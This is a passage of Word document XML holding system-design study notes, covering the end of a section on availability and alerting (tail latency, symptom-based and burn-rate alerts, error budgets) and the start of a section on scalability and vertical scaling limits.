        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why p99 matters more at scale:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> At 10,000 RPS, your p99 request is 100 requests per second experiencing that tail latency. At 100,000 RPS, it's 1,000 requests per second. Scale amplifies tail latency impact linearly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54566BA2" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alerting Philosophy — Symptom vs Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126BF581" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on symptoms, not causes.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Pages should fire when </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users are impacted</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, not when an internal metric threshold is crossed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B60C8F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bad alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> "CPU &gt; 80%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0CBAB8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Good alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> "Error rate &gt; 0.1% for 5 consecutive minutes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C63E67B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>CPU at 80% may be completely fine — maybe you're running a batch job. But users experiencing errors are always a problem. Cause-based alerts create </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert fatigue</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (too many non-actionable pages). Symptom-based alerts create </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>urgency</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> (every page represents real user impact).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8DDB04" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on burn rate, not absolute values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00181C99" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>"Error rate &gt; 1%" can be noisy during low-traffic periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DBBAD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>"Error budget burning at 5x sustainable rate" is always actionable — it will exhaust your monthly budget in 6 days at this rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5A821" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="0C2BC28D">
          <v:rect id="_x0000_i2158" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FB7A7" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E56E50" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C5F270" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Availability = f(Redundancy, Failure Detection Speed, Recovery Speed, Failure Prevention)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F2AACC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="428F3478" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Key Levers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADCA9B4" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Redundancy       → Eliminate single points of failure, ensure independence of failure domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E670427" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Detection        → Monitoring, health checks, alerting on symptoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61173AFC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Recovery         → Automation, runbooks, chaos engineering (test your recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533EC830" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Prevention       → Testing, gradual deployments, change management, chaos engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A92AFD5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3"/>
    <w:p w14:paraId="5870426A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The Availability Equation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0B3A6" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Higher Availability ≠ just more servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8CAA9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Higher Availability = removing correlated failures + faster detection + automated recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB389B0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">                      + graceful degradation + disciplined change management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B60C09" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8B314" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Composite Availability Rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FAB8C5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Components in series  → multiply availabilities (chain gets weaker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078F2161" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Components in parallel → 1 - product of unavailabilities (chain gets stronger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1900487A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Independence assumption → parallel redundancy only works if failures are uncorrelated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE939AD" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Quorum systems → majority must agree; tolerate </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌊</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>(N-1)/2</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌋</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve"> failures with N nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20567505" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD40C1F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The Reliability vs Velocity Balance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1C9CA" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Error Budget = 1 - SLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150743FF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Budget remaining  → ship features, take risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8399E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  Budget exhausted  → freeze deployments, fix reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66575423" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t xml:space="preserve">  This transforms political debates into data-driven policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325C025" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A493A7C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Scalability Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655883B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scalability is the ability of a system to handle increased load by adding resources, while maintaining acceptable performance characteristics (latency, throughput, error rates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A580977" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key distinction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A system is scalable not because it's fast today, but because there exists a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>known path</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> to handle 10x, 100x, or 1000x the current load without a fundamental redesign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6FDF63" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability is measured along multiple axes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9CBE9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Can you serve more requests per second?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32704F2F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data volume:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Can you store and query more data?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A97FE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User concurrency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Can you handle more simultaneous connected users?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC59D8D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Geographic reach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Can you serve users across more regions?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A39FF7D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scalability test question:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> If load doubles tomorrow, what do you do? If the answer is "buy bigger hardware" — you have limited scalability. If the answer is "add more nodes" — you have designed for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B535F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="7DE1F8A7">
          <v:rect id="_x0000_i2287" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A521C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Vertical Scaling (Scale Up) vs. Horizontal Scaling (Scale Out)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7CB38C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Vertical Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2700BE41" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it means:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Add more resources (CPU, RAM, disk, faster network) to a single machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628F8686" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728A463" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Upgrade from 16-core to 64-core CPU → more threads can execute concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D373E69" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Increase RAM from 64GB to 512GB → larger working sets fit in memory, fewer disk reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6210D2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Replace HDD with NVMe SSD → I/O latency drops from milliseconds to microseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C177D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Upgrade network from 1Gbps to 25Gbps → more data throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028DF007" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DF950" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>No application changes needed. A single-threaded application benefits from faster cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56923174" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>No distributed systems complexity. No network partitions between components. No consistency issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180133F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Simpler operational model — one machine to monitor, patch, backup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696F2523" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hard limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F093F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical ceiling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The largest single machine commercially available (as of current era) is ~448 cores, ~24TB RAM. You cannot go beyond physics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13696C49" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cost curve is non-linear:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A server with 2x the CPU is often 3–4x the price. Diminishing returns economically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BE22B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single point of failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> One machine means one failure domain. No matter how reliable, it will eventually fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD06790" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory bus contention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Beyond ~8 sockets (NUMA architectures), memory access latency becomes non-uniform. Accessing memory on a remote NUMA node is 2–3x slower than local. Applications must be NUMA-aware to benefit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2521ADEB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lock contention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> With many cores, shared data structures become bottlenecks. The application itself may not scale linearly with cores (Amdahl's Law).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1819E977" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amdahl's Law — The mathematical limit of vertical scaling:</w:t>
      </w:r>
    </w:p>
